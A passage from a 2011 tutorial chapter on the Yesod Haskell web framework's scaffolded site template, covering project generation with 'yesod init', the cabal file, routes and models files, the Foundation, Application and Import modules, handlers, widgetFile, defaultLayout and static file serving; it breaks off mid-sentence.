a special encoding before I write and read from the stream or something similar to that? Any help would be appreciated, Ryan So I've narrowed down the issue, but unsure why it's happening. I slightly altered your last project to contain a set of basic string values. If you include the strings on line 179 of dbrowstream it fails after 30 rows, if you exclude them it works beautifully. You can have a look at the code I altered here: skydrive.live.com/redir.aspx Any help would be greatly appreciated. it looks like something to do with the string length. If I replace line #179 with this below code it works. model.AMP = new string('a', 40 ); And if replace the line with this below code also it works model.AMP = stringCache[i – 1]; if (model.AMP.Length != 40) { model.AMP += new string(' ', 40 – model.AMP.Length); } Let me some more research and get back to you It's the memory stream. I implemented a basic thread safe memory stream found on code project, here:…/PipeStream-a-Memory-Efficient-and-Thread-Safe-Stre and the issues went away. I'm going to do some additional research into thread safe memory streams because this implementation is much slower than a straight memory stream, but that seems to be the issue. If you have any suggestions on other stream types that might do the trick let me know. Regards, Ryan Ran this utility and with the existing code in it, the host service could process the records seamlessly if they are in limited to 10-20 thousand. Tried for a 0.1 million record scenario and the service ran out of memory. Any suggestions for handling this scenario? Regards, Sanjay Really helpful article. We tried the given utility and found an issue with processing of huge number of records in our case around half a million records. For few thousands this utility works fine. Any suggestions for handling huge records? Regards, Sanjay
https://blogs.msdn.microsoft.com/webapps/2012/09/06/custom-wcf-streaming/
CC-MAIN-2016-36
refinedweb
1,900
57.16
Math::Clipper - Polygon clipping in 2D use Math::Clipper ':all'; my $clipper = Math::Clipper->new; $clipper->add_subject_polygon( [ [-100, 100], [ 0, -200], [100, 100] ] ); $clipper->add_clip_polygon( [ [-100, -100], [100, -100], [ 0, 200] ] ); my $result = $clipper->execute(CT_DIFFERENCE); # $result is now a reference to an array of three triangles $clipper->clear(); # all data from previous operation cleared # object ready for reuse # Example with floating point coordinates: # Clipper requires integer input. # These polygons won't work. my $poly_1 = [ [-0.001, 0.001], [0, -0.002], [0.001, 0.001] ]; my $poly_2 = [ [-0.001, -0.001], [0.001, -0.001], [0, 0.002] ]; # But we can have them automatically scaled up (in place) to a safe integer range my $scale = integerize_coordinate_sets( $poly_1 , $poly_2 ); $clipper->add_subject_polygon( $poly_1 ); $clipper->add_clip_polygon( $poly_2 ); my $result = $clipper->execute(CT_DIFFERENCE); # to convert the results (in place) back to the original scale: unscale_coordinate_sets( $scale, $result ); # Example using 32 bit integer math instead of the default 53 or 64 # (less precision, a bit faster) my $clipper32 = Math::Clipper->new; my $scale32 = integerize_coordinate_sets( { bits=>32 } , $poly_1 , $poly_2 ); $clipper32->add_subject_polygon( $poly_1 ); $clipper32->add_clip_polygon( $poly_2 ); my $result32 = $clipper->execute(CT_DIFFERENCE); unscale_coordinate_sets( $scale32, $result32 ); Clipper is a C++ (and Delphi) library that implements polygon clipping. The module optionally exports a few constants to your namespace. Standard Exporter semantics apply (including the :all tag). The list of exportable constants is comprised of the clip operation types (which should be self-explanatory): CT_INTERSECTION CT_UNION CT_DIFFERENCE CT_XOR Additionally, there are constants that set the polygon fill type during the clipping operation: PFT_EVENODD PFT_NONZERO PFT_POSITIVE PFT_NEGATIVE INTEGERS: Clipper 4.x works with polygons with integer coordinates. Data in floating point format will need to be scaled appropriately to be converted to the available integer range before polygons are added to a clipper object. (Scaling utilities are provided here.) A Polygon is represented by a reference to an array of 2D points. A Point is, in turn, represented by a reference to an array containing two numbers: The X and Y coordinates. A 1x1 square polygon example: [ [0, 0], [1, 0], [1, 1], [0, 1] ] Sets of polygons, as returned by the execute method, are represented by an array reference containing 0 or more polygons. Clipper also has a polygon type that explicitly associates an outer polygon with any additional polygons that describe "holes" in the filled region of the outer polygon. This is called an ExPolygon. The data structure for an ExPolygon is as follows,: { outer => [ <polygon> ], holes => [ [ <polygon> ], [ <polygon> ], ... ] } The "fill type" of a polygon refers to the strategy used to determine which side of a polygon is the inside, and whether a polygon represents a filled region, or a hole. You may optionally specify the fill type of your subject and clip polygons when you call the execute method. When you specify the NONZERO fill type, the winding order of polygon points determines whether a polygon is filled, or represents a hole. Clipper uses the convention that counter clockwise wound polygons are filled, while clockwise wound polygons represent holes. This strategy is more explicit, but requires that you manage winding order of all polygons. The EVENODD fill type strategy uses a test segment, with it's start point inside a polygon, and it's end point out beyond the bounding box of all polygons in question. All intersections between the segment and all polygons are calculated. If the intersection count is odd, the inner-most (if nested) polygon containing the segment's start point is considered to be filled. When the intersection count is even, that polygon is considered to be a hole. For an example case in which NONZERO and EVENODD produce different results see "NONZERO vs. EVENODD" section below. Constructor that takes no arguments returns a new Math::Clipper object. Adds a(nother) polygon to the set of polygons that will be clipped. Adds a(nother) polygon to the set of polygons that define the clipping operation. Works the same as add_subject_polygon but adds a whole set of polygons. Works the same as add_clip_polygon but adds a whole set of polygons. Performs the actual clipping operation. Returns the result as a reference to an array of polygons. my $result = $clipper->execute( CT_UNION ); Parameters: the type of the clipping operation defined by one of the constants ( CT_*). Additionally, you may define the polygon fill types ( PFT_*) of the subject and clipping polygons as second and third parameters respectively. By default, even-odd filling ( PFT_EVENODD) will be used. my $result = $clipper->execute( CT_UNION, PFT_EVENODD, PFT_EVENODD ); Like execute, performs the actual clipping operation, but returns a reference to an array of ExPolygons. (see "CONVENTIONS") For reuse of a Math::Clipper object, you can call the clear method to remove all polygons and internal data from previous clipping operations. Takes an array of polygons and scales all point coordinates so that the values will fit in the integer range available. Returns an array reference containing the scaling factors used for each coordinate column. The polygon data will be scaled in-place. The scaling vector is returned so you can "unscale" the data when you're done, using unscale_coordinate_sets. my $scale_vector = integerize_coordinate_sets( $poly1 , $poly2 , $poly3 ); The main purpose of this function is to convert floating point coordinate data to integers. As of Clipper version 4, only integer coordinate data is allowed. This helps make the intersection algorithm robust, but it's a bit inconvenient if your data is in floating point format. This utility function is meant to make it easy to convert your data to Clipper-friendly integers, while retaining as much precision as possible. When you're done with your clipping operations, you can use the unscale_coordinate_sets function to scale results back to your original scale. Convert all your polygons at once, with one call to integerize_coordinate_sets, before loading the polygons into your clipper object. The scaling factors need to be calculated so that all polygons involved fit in the available integer space. By default, the scaling is uniform between coordinate columns (e.g., the X values are scaled by the same factor as the Y values) making all the scaling factors returned the same. In other words, by default, the aspect ratio between X and Y is constrained. Options may be passed in an anonymous hash, as the first argument, to override defaults. If the first argument is not a hash reference, it is taken instead as the first polygon to be scaled. my $scale_vector = integerize_coordinate_sets( { constrain => 0, # don't do uniform scaling bits => 32 # use the +/-1,073,741,822 integer range }, $poly1 , $poly2 , $poly3 ); The bits option can be 32, 53, or 64. The default will be 53 or 64, depending on whether your Perl uses 64 bit integers AND long doubles by default. (The scaling involves math with native doubles, so it's not enough to just have 64 bit integers.) Setting the bits option to 32 may provide a modest speed boost, by allowing Clipper to avoid calculations with large integer types. The constrain option is a boolean. Default is true. When set to false, each column of coordinates (X, Y) will be scaled independently. This may be useful when the domain of the X values is very much larger or smaller than the domain of the Y values, to get better resolution for the smaller domain. The different scaling factors will be available in the returned scaling vector (array reference). This utility will also operate on coordinates with three or more dimensions. Though the context here is 2D, be aware of this if you happen to feed it 3D data. Large domains in the higher dimensions could squeeze the 2D data to nothing if scaling is uniform. This undoes the scaling done by integerize_coordinate_sets. Use this on the polygons returned by the execute method. Pass the scaling vector returned by integerize_coordinate_sets, and the polygons to "unscale". The polygon coordinates will be updated in place. unscale_coordinate_sets($scale,$clipper_result); my $offset_polygons = offset($polygons, $distance); my $offset_polygons = offset($polygons, $distance, $scale, $jointype, $miterlimit); Takes a reference to an array of polygons ( $polygons), a positive or negative offset dimension ( $distance), and, optionally, a scaling factor ( $scale), a join type ( $jointype) and a numeric angle limit for the JT_MITER join type. The polygons will use the NONZERO fill strategy, so filled areas and holes can be specified by polygon winding order. A positive offset dimension makes filled polygons grow outward, and their holes shrink. A negative offset makes polygons shrink and their holes grow. Coordinates will be multiplied by the scaling factor before the offset operation and the results divided by the scaling factor. The default scaling factor is 100. Setting the scaling factor higher will result in more points and smoother contours in the offset results. Returns a new set of polygons, offset by the given dimension. my $offset_polygons = offset($polygons, 5.5); # offset by 5.5 or my $offset_polygons = offset($polygons, 5.5, 1000); # smoother results, proliferation of points WARNING: As you increase the scaling factor, the number of points grows quickly, and will happily consume all of your RAM. Large offset dimensions also contribute to a proliferation of points. Floating point data in the input is acceptable - in that case, the scaling factor also determines how many decimal digits you'll get in the results. It is not necessary, and generally not desirable to use integerize_coordinate_sets to prepare data for this function. When doing negative offsets, you may find the winding order of the results to be the opposite of what you expect, although this seems to be fixed in recent Clipper versions. Check the order and change it if it is important in your application. Join type can be one of JT_MITER, JT_ROUND or JT_SQUARE. Returns the signed area of a single polygon. A counter clockwise wound polygon area will be positive. A clockwise wound polygon area will be negative. Coordinate data should be integers. $area = area($polygon); Determine the winding order of a polygon. It returns a true value if the polygon is counter-clockwise and you're assuming a display where the Y-axis coordinates are positive upward, or if the polygon is clockwise and you're assuming a positive-downward Y-axis. Coordinate data should be integers. The majority of 2D graphic display libraries have their origin (0,0) at the top left corner, thus Y increases downward; however some libraries (Quartz, OpenGL) as well as non-display applications (CNC) assume Y increases upward. my $poly = [ [0, 0] , [2, 0] , [1, 1] ]; # a counter clockwise wound polygon (assuming Y upward) my $direction = orientation($poly); # now $direction == 1 This function was previously named is_counter_clockwise(). This symbol is still exported for backwards compatibility; however you're encouraged to switch it to orientation() as the underlying Clipper library switched to it too to clarify the Y axis convention issue. These functions convert self-intersecting polygons (known as complex polygons) to simple polygons. simplify_polygon() takes a single polygon as first argument, while simplify_polygons() takes multiple polygons in a single arrayref. The second argument must be a polyfilltype constant (PFT_*, see above). Both return an arrayref of polygons. Clipper accepts 64 bit integer input, but limits the domain of input coordinate values to +/-4,611,686,018,427,387,902, to allow enough overhead for certain calculations. Coordinate values up to these limits are possible with Perls built to support 64 bit integers. A typical Perl that supports 32 bit integers can alternatively store 53 bit integers as floating point numbers. In this case, the coordinate domain is limited to +/-9,007,199,254,740,992. When optionally constraining coordinate values to 32 bit integers, the domain is +/-1,073,741,822. The integerize_coordinate_sets utility function automatically respects whichever limit applies to your Perl build. Consider the following example: my $p1 = [ [0,0], [200000,0], [200000,200000] ]; # CCW my $p2 = [ [0,200000], [0,0], [200000,200000] ]; # CCW my $p3 = [ [0,0], [200000,0], [200000,200000], [0,200000] ]; # CCW my $clipper = Math::Clipper->new; $clipper->add_subject_polygon($p1); $clipper->add_clip_polygons([$p2, $p3]); my $result = $clipper->execute(CT_UNION, PFT_EVENODD, PFT_EVENODD); $p3 is a square, and $p1 and $p2 are triangles covering two halves of the $p3 area. The CT_UNION operation will produce different results, depending on whether PFT_EVENODD or PFT_NONZERO is used. These are the two different strategies used by Clipper to identify filled vs. empty regions. Let's see the thing in detail: $p2 and $p3 are the clip polygons. $p2 overlaps half of $p3. With the PFT_EVENODD fill strategy, the number of polygons that overlap in a given area determines whether that area is a hole or a filled region. If an odd number of polygons overlap there, it's a filled region. If an even number, it's a hole/empty region. So with PFT_EVENODD, winding order doesn't matter. What matters is where areas overlap. So, using PFT_EVENODD, and considering $p2 and $p3 as the set of clipping polygons, the fact that $p2 overlaps half of $p3 means that the region where they overlap is empty. In effect, in this example, the set of clipping polygons ends up defining the same shape as the subject polygon $p1. So the union is just the union of two identical polygons, and the result is a triangle equivalent to $p1. If, instead, the PFT_NONZERO strategy is specified, the set of clipping polygons is understood as two filled polygons, because of the winding order. The area where they overlap is considered filled, because there is at least one filled polygon in that area. The set of clipping polygons in this case is equivalent to the square $p3, and the result of the CT_UNION operation is also equivalent to the square $p3. This is a good example of how PFT_NONZERO is more explicit, and perhaps more intuitive. The SourceForge project page of Clipper: This module was built around, and includes, Clipper version 5.0.3. The Perl module was written by: Steffen Mueller (<smueller@cpan.org>), Mike Sheldrake and Alessandro Ranellucci (aar/alexrj) But the underlying library Clipper was written by Angus Johnson. Check the SourceForge project page for contact information. The Math::Clipper module is but we are shipping a copy of the Clipper C++ library, which is Math::Clipper is available under the same license as Clipper itself. This is the boost.
http://search.cpan.org/~aar/Math-Clipper-1.17/lib/Math/Clipper.pm
CC-MAIN-2016-18
refinedweb
2,374
54.52
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode. Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript). Hi guys, As you may know, c4d doesn't allow adding watermark post-effect (project name, Time Code...) to OpenGl render engine. I'm trying to do this in python. but no luck! I've tried to add text objects that print the required attributes and attach them to the camera, but when adding DOF Effect in Enhanced OpenGL mode the text objects will disappear because they are simply out of focus. I've also tried to add a custom HUD but unfortunately, HUDs don't render in OpenGL renderer too. Until recently I discovered that realflow for c4d plugin add a special HUD that shows the particles count, fluid name.... and it renders in OpenGL! How could I add such and HUD in python if this is complicated could I exclude an object from being affected by DOF effect in python? Your Help is much appreciated. Hi @ashambe, you can render HUD in OpenGL it's true that the Options tabs are not displayed if the render engine is set to OpenGL but if you defined it in standard (or even have the option container selected) then switch to OpenGL you can still access the Render HUD option. With that's said you can have a Python Script that draws HUD text. Here an example import c4d #Welcome to the world of Python def draw(bd): values = [] # All txt to display txtList = [doc.GetActiveRenderData().GetName(), doc.GetDocumentName(), doc.GetFirstObject().GetName()] # Adds txt for each frame position = bd.GetSafeFrame() for x in xrange(len(txtList)): pos = c4d.Vector(position["cl"] + 2, 20 + 25 * x, 0) tmpDict = { "_txt" : txtList[x], "_position" : pos} values.append(tmpDict) # Sets the matrix to screen space bd.SetMatrix_Screen() # Enables depth buffer. bd.SetDepth(True) # Draws points indices at point coordinates bd.DrawMultipleHUDText(values) return True def main(): pass #put in your code here And the attached scene with the code and the settings already enabled. renderHud.c4d Cheers, Maxime. @m_adam Thanks gana try them both, much appreciated. @m_adam I've triedthe custom python script that draws HUD text but i'm stucked in the same original problem, The DOF effect is affecting the new HUDs which are blurred out I've tried to change the value of the bd.SetDepth to False but no luck. @ashambe May I ask you in which version and OS (with version) are you? Using the next code is working nicely in R21.1 # Disables depth buffer. bd.SetDepth(False) # Draws points indices at point coordinates bd.DrawMultipleHUDText(values) # Enables depth buffer. bd.SetDepth(True) Hey @m_adam I'm Using r20 windows 10, Thanks a lot m_adam Hi @ashambe may I ask your code because here I'm not able to reproduce it with bd.SetDepth(False) in Win 10 R20. @m_adam Hi, I'm testing the same code you've provided! Yes the code I provided didn't work but with It worked. Can you share a scene, please? What's your exact version (including subversion not only R20 but R20.XX) of Windows/Driver/Cinema 4D? Since I can't reproduce, without more information I can't help you. @m_adam Ah OK great will test it and get back to you, Thanks sir.
https://plugincafe.maxon.net/topic/12034/hud-on-opengl-previews/10
CC-MAIN-2022-27
refinedweb
577
75.5
wikiHow to Add an Automated Live Chat to an ASP.NET Website If you're a .NET developer, this wiki will help you to add an Automated Live Chat Agent to your ASP.NET website for free using a developer-friendly class library from NuGet.org. Many of the automated agents online use only keywords based pattern recognition system and are very susceptible to making weird responses. A true automated live chat agent should always be backed up by an architecture that facilitates complex pattern recognition and generation of humanly responses. This tutorial uses SIML (Synthetic Intelligence markup language) as the markup language for writing your agent's knowledge base. It's important to note that this wiki is designed for developers working with ASP websites that targets .NET Framework 4.5 and above Steps - 1Import SynChat library from NuGet. In your ASP Website project click Tools->NuGet Package Manager->Package Manager Console and type Install-Package SynChat. This will import the SynChat class library from NuGet along with it's dependency library. - 2Add a new Web Form to your project. Right click your project and click Add->New Item.. and select Web Form. Name this new web form "ChatService.aspx". Now double click the file and remove all the lines of code except the first line. - 3Right Click the above file and select View Code and add the following. Replace the string with your website address. using System; using Syn.Automation.Chat; namespace Automated_Live_Chat_Demo { public partial class ChatService : System.Web.UI.Page { private static readonly ChatAgent Agent; static ChatService() { Agent = new ChatAgent { ServiceUrl = "", ResourceUrl = "", Name = "Maya", Title = "Syn Web Assistant", Intro = "Hi I am Maya, I am here to answer your questions.", InputText = "What can I help you with?", Footer = "Syn", FooterLink = "", RestartId = "restart", PackageFileName = "Package.txt" }; } protected void Page_Load(object sender, EventArgs e) { Agent.Process(Request, Response); } } } - 4 - 5Create a knowledge base for your Virtual Agent. Google "Syn Chatbot Studio" and download the program. Select File->New->Project and fill in the details required. Make sure you select Syn Web Assistant as the project template.For more details on working with SIML, google "Synthetic Intelligence Markup Language", and check the Quick Start tutorial on the official website. - 6Export the knowledge base to an SIML Package but change the extension. By default Syn Chatbot Studio will save the file with the extension .simlpk which stands for SIML Package however if this file is to be referenced from a URL its mimetype should be accessible therefore change the extension to .txt as shown in the image above. - 7Add the created package file to the Assistant folder. Right click the Assistant folder and select Add->Existing Item.. and select the Package.txt file. - 8Add a simple JavaScript to display the Virtual Chat agent on your website. To do so paste the following coding just above the </form> tag element in your Master Page's HTML code and change with your website address. <script type="text/javascript"> (function () { var scriptElement = document.createElement('script'); scriptElement.type = 'text/javascript'; scriptElement.async = true; scriptElement.src = ''; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(scriptElement); })(); </script> - 9Run your website project and check if the Virtual Chat Agent's Window is visible. - 10Chat with the Virtual Agent and check if you are presented with the desired responses. Community Q&A Tips - You can download SIML files from GitHub. These files are open source in nature and are licensed under Apache License version 2.0. - You can replace the Avatar with your own custom avatar but make sure that you use the .png file format if your wish to have a transparent background and use the exact resolution as used by the avatar images in the demo project - You can map .simlpk extension in IIS to text/plain if you do not wish to rename the file extension to .txt every time you upload your SIML Package to the Assistant folder. - If you add an updated SIML Package to the Assistant folder use the URL to restart the Chat Agent with its new knowledge base. Sources and Citations - GitHub Repository – research source - NuGet Package – research source - SIML Quick Start – research source Article Info Categories: Web Programming Thanks to all authors for creating a page that has been read 2,361 times.
http://www.wikihow.com/Add-an-Automated-Live-Chat-to-an-ASP.NET-Website
CC-MAIN-2017-22
refinedweb
714
58.48
Unix Operating System tools dd dd(1) stands for disk duplicator, though it is often humourously called disk destroyer, since misuse can mean total loss of a disk's data. It is an old tool. It pre-dates the convention of starting options with a -, so the command to make a backup of an attached disk is: $ dd if=/dev/sdb of=disk-backup.img if=/dev/sdb specifies that the input file is /dev/sdb which is the second disk attached to the computer. of=disk-backup.img says that the contents of the disk should be written to disk-backup.img. Another use of dd(1) is creating large files. if=/dev/urandom lets you create a file with random contents; if=/dev/zero lets you create a file filled with zeros. Just substituting the if= with the previous command would result in a command that will fill your filesystem. To limit the amount of data copied, specify bs= and count=. bs= specifies the buffer size, which is how much data to read before starting to write. count= specifies how many full buffers to copy, so the amount of data to copy is the product of the two. With that in mind, the following command makes a 512 MiB file full of random data, in blocks of 1KiB. $ dd if=/dev/urandom of=random-file bs=1024 count=524288 The following will create a file full of zeroes. $ dd if=/dev/zero of=random-file bs=1024 count=524288 dd(1) also supports the seek= option, which can be used to start writing data at a given offset to the file. This could be useful for writing to a partition elsewhere on the disk, or creating a sparse file. This command writes the disk image, skipping the first block of the disk. $ dd if=disk.img of=/dev/sdb seek=1 This command creates a 1GiB sparse file on file-systems that support it. $ dd if=/dev/zero bs=1 of=sparse-file \ seek=$(( (1024 * 1024 * 1024) - 1 )) count=1 The intent of truncate -s 1GiB sparse-file is clearer. shred Unlike dd which is only affectionately known as Data Destroyer, shred(1) is supposed to do this. This writes random data in-place to attempt to replace the file contents on disk, so its data cannot be recovered. Unfortunately, file-systems are not so simple that this works any more. Journalled file systems like ext4 may have a copy in the journal, and CoW file-systems like btrfs may have multiple copies around. Partly this is a result of an evolutionary arms race against storage devices by file-systems to do their very best to not lose data. For this reason, I would recommend using shred(1) on the device you believe the file-system to be backed by, or if you're feeling particularly paranoid, remove the drive from the machine and physically shred it into as may pieces as you feel comfortable with.. sync There are various layers of caching involved when writing data to a hard-disk, to provide better throughput. If you're using the C standard API, fflush(3) is the first thing you need to do. This will write any data that is being buffered by the C library to the VFS layer. This just guarantees that any reads or writes performed by talking to your operating system will see that version of the data. It will be cached in memory until a convenient time when it can be written out again. It has not yet made it onto the disk, to ensure this, you need to call one of the sync system calls. These give as good a guarantee as you can get, that if you were to suddenly lose power, your data would be on the disk. It is not possible to directly sync the writes associated with the file descriptor from shell, but you can use the sync(1) command, which will do its best with every disk. Of course, none of this can actually guarantee that your data is safely written to the disk, as it may lie about the writes having made it to disk and cache it for better throughput, and unless it can guarantee with some form of internal power supply that it will have finished writes before it loses power, then your data will be lost. uname uname(1) is an old interface for telling you more about your operating system. Common uses are uname -r to say which version you are using, uname -m says which machine you are running on, and uname -a does its best to show you everything. For example, since I use a debian chroot on an Android tablet, I get the following: $ uname -a Linux localhost 3.1.10-gea45494 #1 SMP PREEMPT Wed May 22 20:26:32 EST 2013 armv7l GNU/Linux mknod and mkfifo mknod(1) and mkfifo(1) create special files. /dev/null is one such a file. mkfifo(1) is a special case of mknod(1), creating a device node with well known properties, while mknod(1) is capable of creating arbitrary device nodes, which may be backed by any physical or virtual device provided by the Kernel. Because of this it is a privileged operation, as you can bypass the permissions imposed on the devices in /dev. Modern Linux systems use a special file-system called devtmpfs to provide device nodes, rather than requiring people to use mknod(1) to populate /dev. mkfifo(1) is useful for shell scripts though, when there are complicated control flows that can't be easily expressed with a pipeline. The following script will pipe ls through cat, and tell you the exit status of both commands without having to rely on bash's PIPESTATUS array. td="$(mktemp -d)" mkfifo "$td/named-pipe" ls >"$td/named-pipe" & # start ls in background, writing to pipe lspid="$!" cat <"$td/named-pipe" & # read pipe contents from pipe # you may start getting ls output to your terminal now catpid="$!" wait "$lspid" echo ls exited "$?" wait "$catpid" echo cat exited "$?" rm -rf "$td" df and du df(1) displays the amount of space used by all your file systems. It can be given a path, at which point it will try to give you an appropriate value for what it thinks is the file system mounted there. Modern Linux systems can have very complicated file systems though, so it may not always give correct results. df(1) for example, can give incorrect results for btrfs, where there's not a 1 to 1 mapping between disks and file-system usage, and is not smart about things like bind-mounts and mount namespaces, so smarter tools like [findmnt(1)][] from util-linux are required. du(1) attempts to inform you of how much disk space is used for a specific file-system tree, so du -s . tells you how much space your current directory is using. du -s / is unlikely to correspond with the same number provided by df /, because there are metadata overheads required, so on normal file-systems the result of df(1) is likely to be larger. btrfs can also produce different results, since it can share data between files. chroot chroot(1) is a useful command for allowing programs with different userland requirements work on the same computer, assuming you don't need too much security. It changes a process' view of the file-system to start at a different point, so you can hypothetically use it to restrict access to certain resources. There are various ways of escaping a chroot, so it's insufficient to protect your system from untrusted programs. Containers or virtual machines are more secure, but don't have a standard interface. Chroots are still useful for trusted programs though. For example, I run debian squeeze on my Android tablet to do my blogging. nice nice(1) can be used to hint to your operating system's scheduler that a process requires more or less resources. This can't be used to prevent a mis-behaving process from consuming more than its fair share of CPU, since it could always fork further worker processes. Linux attempts to handle this deficiency with cgroups.
https://yakking.branchable.com/posts/careful-now/
CC-MAIN-2021-43
refinedweb
1,378
68.2
ok so why doesn't this work. i mean i can go into the different sections but when i'm back at main i can't go into, lets say new game again. ok. i know i'm a super noob but i'm eager to learn. thx a bunch. Code:#include <iostream> using namespace std; int main() { int x; while (x!=3) { cout<<"**MAIN MENU**\n\n"; cout<<"1.New game\n2.Options\n3.Exit\n"; cout<<"Choice:"; cin>>x; cout<<"\n"; /*NEW GAME*/ if (x==1) { int y; while (y!=2) { cout<<"*New game*\n\n"; cout<<"1.Map\n2.Back\n"; cout<<"Choice:"; cin>>y; cout<<"\n";} } /*OPTIONS*/ if (x==2) { int z; while (z!=2) { cout<<"*Options*\n\n"; cout<<"1.Difficulty\n2.Back\n"; cout<<"Choice:"; cin>>z; cout<<"\n";} } } }
http://cboard.cprogramming.com/cplusplus-programming/100787-while-question.html
CC-MAIN-2015-14
refinedweb
135
88.63
Scaffolding and the Site Template December 9, 2011 Michael Snoyman Scaffolding and the Site Template So you're tired of running small examples, and ready to write a real site? Then you're at the right chapter. Even with the entire Yesod library at your fingertips, there are still a lot of steps you need to go through to get a production-quality site setup: - Config file parsing - Signal handling (*nix) - More efficient static file serving - A good file layout The scaffolded site is a combination of many Yesoders' best practices combined together into a ready-to-use skeleton for your sites. It is highly recommended for all sites. This chapter will explain the overall structure of the scaffolding, how to use it, and some of its less-than-obvious features. How to Scaffold The yesod package installs both a library and an executable (conveniently named yesod as well). This executable provides a few commands (run yesod by itself to get a list). In order to generate a scaffolding, the command is yesod init. This will start a question-and-answer process where you get to provide basic details (your name, the project name, etc). After answering the questions, you will have a site template in a subfolder with the name of your project. The most important of these questions is the database backend. You get four choices here: SQLite, PostgreSQL, MongoDB, and tiny. tiny is not a database backend; instead, it is specifying that you do not want to use any database. This option also turns off a few extra dependencies, giving you a leaner overall site. The remainder of this chapter will focus on the scaffoldings for one of the database backends. There will be minor differences for the tiny backend. After creating your files, the scaffolder will print a message about getting started. It gives two sets of options for commands: one using cabal, and the other using cabal-dev. cabal-dev is basically a wrapper around cabal which causes all dependencies to be built in a sandbox. Using it is a good way to ensure that installing other packages will not break your site setup. It is strongly recommended. If you don't have cabal-dev, you can install it by running cabal install cabal-dev. Note that you really do need to use the cabal install (or cabal-dev install) command. Most likely, you do not yet have all the dependencies in place needed by your site. For example, none of the database backends, nor the Javascript minifier (hjsmin) are installed when installing the yesod package. Finally, to launch your development site, you would use yesod devel (or yesod --dev devel). This site will automatically reload whenever you change your code. File Structure The scaffolded site is built as a fully cabalized Haskell package. In addition to source files, config files, templates, and static files are produced as well. Cabal file Whether directly using cabal, or indirectly using yesod devel, building your code will always go through the cabal file. If you open the file, you'll see that there are both library and executable blocks. Only one of these is built at a time, depending on the value of the library-only flag. If library-only is turned on, then the library is built, which is how yesod devel calls your app. Otherwise, the executable is built. The library-only flag should only be used by yesod devel; you should never be explicitly passing it into cabal. There is an additional flag, dev, that allows cabal to build an executable, but turns on some of the same features as the library-only flag, i.e., no optimizations and reload versions of the Shakespearean template functions. In general, you will build as follows: - When developing, use yesod devel exclusively. - When building a production build, perform cabal clean && cabal configure && cabal build. This will produce an optimized executable in your distfolder. You'll also notice that we specify all language extensions in the cabal file. The extensions are specified twice: once for the executable, and once for the library. If you add any extensions to the list, add it to both places. You might be surprised to see the NoImplicitPrelude extension. We turn this on since the site includes its own module, Import, with a few changes to the Prelude that make working with Yesod a little more convenient. The last thing to note is the exported-modules list. If you add any modules to your application, you must update this list to get yesod devel to work correctly. Unfortunately, neither Cabal nor GHC will give you a warning if you forgot to make this update, and instead you'll get a very scary-looking error message from yesod devel. Routes and entities Multiple times in this book, you've seen a comment like "We're declaring our routes/entities with quasiquotes for convenience. In a production site, you should use an external file." The scaffolding uses such an external file. Routes are defined in config/routes, and entities in config/models. They have the exact same syntax as the quasiquoting you've seen throughout the book, and yesod devel knows to automatically recompile the appropriate modules when these files change. The models files is referenced by Model.hs. You are free to declare whatever you like in this file, but here are some guidelines: - Any data types used in entitiesmust be imported/declared in Model.hs, above the persistFilecall. - Helper utilities should either be declared in Import.hsor, if very model-centric, in a file within the Modelfolder and imported into Import.hs. Foundation and Application modules The mkYesod function which we have used throughout the book declares a few things: - Route type - Route render function - Dispatch function The dispatch function refers to all of the handler functions, and therefore all of those must either be defined in the same file as the dispatch function, or be imported by the dispatch function. Meanwhile, the handler functions will almost certainly refer to the route type. Therefore, they must be either in the same file where the route type is defined, or must import that file. If you follow the logic here, your entire application must essentially live in a single file! Clearly this isn't what we want. So instead of using mkYesod, the scaffolding site uses a decomposed version of the function. Foundation calls mkYesodData, which declares the route type and render function. Since it does not declare the dispatch function, the handler functions need not be in scope. Import.hs imports Foundation.hs, and all the handler modules import Import.hs. In Application.hs, we call mkYesodDispatch, which creates our dispatch function. For this to work, all handler functions must be in scope, so be sure to add an import statement for any new handler modules you create. Other than that, Application.hs is pretty simple. It provides two functions: withDevelAppPort is used by yesod devel to launch your app, and getApplication is used by the executable to launch. Foundation.hs is much more exciting. It: - Declares your foundation datatype - Declares a number of instances, such as Yesod, YesodAuth, and YesodPersist - Imports the messages files. If you look for the line starting with mkMessage, you will see that it specifies the folder containing the messages ( messages) and the default language (en, for English). This is the right file for adding extra instances for your foundation, such as YesodAuthEmail or YesodBreadcrumbs. We'll be referring back to this file later, as we discussed some of the special implementations of Yesod typeclass methods. Import The Import module was born out of a few commonly recurring patterns. - I want to define some helper functions (maybe the <> = mappendoperator) to be used by all handlers. - I'm always adding the same five import statements ( Data.Text, Control.Applicative, etc) to every handler module. - I want to make sure I never use some evil function ( head, readFile, ...) from Prelude. The solution is to turn on the NoImplicitPrelude language extension, re-export the parts of Prelude we want, add in all the other stuff we want, define our own functions as well, and then import this file in all handlers. Handler modules Handler modules should go inside the Handler folder. The site template includes one module: Handler/Root.hs. How you split up your handler functions into individual modules is your decision, but a good rule of thumb is: - Different methods for the same route should go in the same file, e.g. getBlogRand postBlogR. - Related routes can also usually go in the same file, e.g., getPeopleRand getPersonR. Of course, it's entirely up to you. When you add a new handler file, make sure you do the following: - Add it to version control (you are using version control, right?). - Add it to the cabal file. - Add it to the Application.hsfile. - Put a module statement at the top, and an import Importline below it. widgetFile It's very common to want to include CSS and Javascript specific to a page. You don't want to have to remember to include those Lucius and Julius files manually every time you refer to a Hamlet file. For this, the site template provides the widgetFile function. If you have a handler function: getRootR = defaultLayout $(widgetFile "homepage") , Yesod will look for the following files: templates/homepage.hamlet templates/homepage.lucius templates/homepage.cassius templates/homepage.julius If any of those files are present, they will be automatically included in the output. defaultLayout One of the first things you're going to want to customize is the look of your site. The layout is actually broken up into two files: templates/default-layout-wrapper.hamletcontains just the basic shell of a page. This file is interpreted as plain Hamlet, not as a Widget, and therefore cannot refer to other widgets, embed i18n strings, or add extra CSS/JS. templates/default-layout.hamletis where you would put the bulk of your page. You must remember to include the widgetvalue in the page, as that contains the per-page contents. This file is interpreted as a Widget. Also, since default-layout is included via the widgetFile function, any Lucius, Cassius, or Julius files named default-layout.* will automatically be included as well. Static files The scaffolded site automatically includes the static file subsite, optimized for serving files that will not change over the lifetime of the current build. What this means is that: - When your static file identifiers are generated (e.g., static/mylogo.pngbecomes mylogo_png), a query-string parameter is added to it with a hash of the contents of the file. All of this happens at compile time. - When yesod-staticserves your static files, it sets 